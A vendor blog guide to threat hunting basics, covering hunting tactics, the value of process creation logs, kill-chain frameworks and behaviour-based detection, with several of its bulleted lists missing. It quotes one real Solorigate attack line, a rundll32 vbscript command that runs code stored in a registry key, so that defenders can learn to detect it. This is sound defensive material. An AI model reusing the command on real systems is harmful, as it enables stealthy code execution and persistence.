We could start this article with a bold statement saying that Threat Hunting is easier than you think, and by reading our blog post, you will instantly become a pro. Unfortunately or luckily, that’s not the case. However, we understand that starting out as a Cyber Threat Hunter is tough. That’s why we are introducing a series of guides on Threat Hunting Basics.
Preventive measures are not a panacea for an impenetrable defense. That’s where threat hunting comes into play. However, where do you start? In this blog, we’ll take a closer look at threat hunting methodologies, particularly threat hunting techniques and threat hunting tactics.
Threat hunting tactics refer to the fundamental approach a Cyber Threat Hunter leverages for both reactive and proactive threat hunting.
Target-driven threat hunting works well for initial data collection while focusing on a particular threat you try to find in your environment, such as:
A data-driven approach turns the target-driven hunting on its head. You collect data, analyze it, and define what to hunt for, depending on the items of interest and available data. A data set that allows detection of one or more threats may be a good starting point.
Data-driven threat hunting allows organizations to focus on what they have today. In contrast, target-driven threat hunting typically identifies gaps in data that may require additional resources to capture. The best threat hunting teams tend to use both tactics.
Generally, adversaries take the path of least resistance to obtain their goals. Like any human, they make mistakes, leave evidence, and recycle techniques. And you can use it to your advantage. With that said, let’s dive into the basic threat hunting methodology for effective hunts.
While this step might seem obvious, you’ll be surprised to know how many organizations aren’t even aware of the exact number of their endpoints. Before getting into the threat hunting techniques, you should ask yourself the following questions:
The fundamental part of any threat hunt is data. Data sources can be active or passive:
Both types of data have value. However, for a Cyber Threat Hunter, passive data sources are more useful because they provide complete visibility without relying on someone else’s research and detection logic (their bias).
Another challenge is managing the cost of data collection, which might be a real pain. Applying a ‘greedy’ approach might leave you without the required logs. And yes, you also need historical events. General advice is to keep at least a year of logs. However, it depends on the compliance, industry specifics, and your organization’s strategy. Note that passive data sources will be more expensive to collect than active sources.
Perhaps one of the most important passive data sources to collect is
Process creation events can help cover detection for more than two-thirds of the existing MITRE ATT&CK techniques. Some might argue that gathering
process creation events lead to password leakages. However, you lose more by not collecting these logs, and there are workarounds to avoid a possible exposure of sensitive data.
Process creation is also supported out of the box from Windows and Linux systems. In addition, enriched logs from EDR sources or Microsoft’s sysmon are very common.
Every cyber attack is a process, and it is far from being random. That’s why the concept of a kill chain exists. Kill chain refers to the steps adversaries take to achieve their goals. If you’re new to threat hunting, relying on your intuition and think-like-an-adversary approach might not be the best idea. However, trying to analyze attack vectors and different APTs is a great place to start.
Adversaries can’t snap their fingers to ‘own’ your systems. Generally, they must take a series of actions towards reaching their objective(s). Most of the time, this involves steps like gaining a foothold, establishing persistence, elevating permissions, lateral movement, etc.
There are certain types of attack that may allow an adversary to skirt some or even all of these measures. For instance:
First, check one of the frameworks (MITRE ATT&CK, Cyber Kill Chain, etc.) and take a deeper look at it to understand what might be behind an attack. Of course, there is no universal matrix that can be applied to every case, but every framework has a similar approach to the attack vectors description.
When you are familiar with the kill chain, think of what techniques and sub-techniques you should cover in the first place. Trying to cover all of the techniques might be your first intention, but, most likely, this won’t work because it is pricey, time-consuming, and still doesn’t protect your system completely.
To avoid the unnecessary fuss, keep in mind the following ideas:
When you’ve collected your logs, it’s time to analyze them. As a Cyber Threat Hunter, you shouldn’t only be good at code writing because working with data is essential. Practice makes perfect but what matters is who you learn from. Based on our Threat Hunters’ experience, we’ve collected the following tips for you.
The following suggestions can significantly improve your threat hunting process:
process creation) in one report
.csv, and give it to your analysts or analyze it yourself.
You might feel like trying to find your way through 2 million alerts is too much. However, it won’t usually take more than a few hours, even with a couple of millions of alerts.
Process creation auditing is your best way to go, even for zero days and supply chain attacks. As we’ve mentioned before, only gathering these events will cover most of the techniques.
Remember that not every behavior is cataloged on MITRE ATT&CK. For example, keep in mind the short file names (e.g.,
1.pst) or suspicious paths, such as
C:\windows\temp. According to Florian Roth, you should also pay attention to the following anomalies:
When the preparation is over (you know your infrastructure well, you have the data you need, and you’ve analyzed it), you can start the hunt. Detecting advanced attacks might seem complicated, but it gets much easier with the right telemetry. Remember that even advanced adversaries rely on recycled tactics, techniques, and procedures (TTPs).
Still doubting? Then, here is a representative example of the Solarwinds supply chain attack that remained undiscovered for around a year.
Almost every attack has more plausible and more difficult things to detect. In the Solorigate example, you can see some advanced and novel techniques that are complicated (not impossible, though) to hunt against, such as:
On the other hand, there are more trivial techniques and methods to hunt for:
The following script didn’t necessarily have to be malicious. However, if you see
rundll32.exe running the
vbscript:"\, you should pay attention to this and at least check if it has run before in your environment. Even though the adversaries did some extremely advanced stuff, they still used a well-known LOLBAS “
Rundll32.exe vbscript:"\..\mshtml,RunHTMLApplication "+Execute (CreateObject("Wscript.Shell").RegRead("HKLM\SOFTWARE\MICROSOFT\Windo ws\CurrentVersion\sibot\")) (window.close)
What do we see here?
Rundll32run with known LOLBAS arguments
Again, this could easily be detected if you had the right telemetry. Not to mention that before the attack disclosure, we had a rule in the SOC Prime Platform that would generate an alert based on the
For more examples, you can watch a webinar prepared by our Threat Hunting Engineering Lead Adam Swan, where he analyzes multiple attacks and the detections that could have been used.
Are IOC-based rules effective? Yes, but not always. The issue with them is that IOC-report releases often take longer than the cybersecurity reality allows. In addition, most likely, IPs, hashes, domains, and tools won’t be reused. Whereas a threat hunting query built to identify unusual
rundll32 activity may be useful for decades instead of days/weeks/months. So, opt for behavior-based rules for a more long-lasting effect.
Of course, timely and high-quality IOC-based rules can be handy. Often IOC-based detections are best used retroactively to see if you were targeted in the past instead of detecting current attacks. In the end, you shouldn’t forget about the Pyramid of Pain when approaching threat hunting and incident response.
Being a Cyber Threat Hunter is probably one of the most creative roles in cybersecurity, even though it is based on analysis. To keep on with the pace of the industry, you should always get additional knowledge, insights, and inspiration. Here are a few ideas that could enrich your threat hunting process:
Threat Hunting might be overwhelming and challenging, but it’s worth it. Learn, practice, and be curious. And we’ll try to make your path smoother with our guides on Threat Hunting Basics.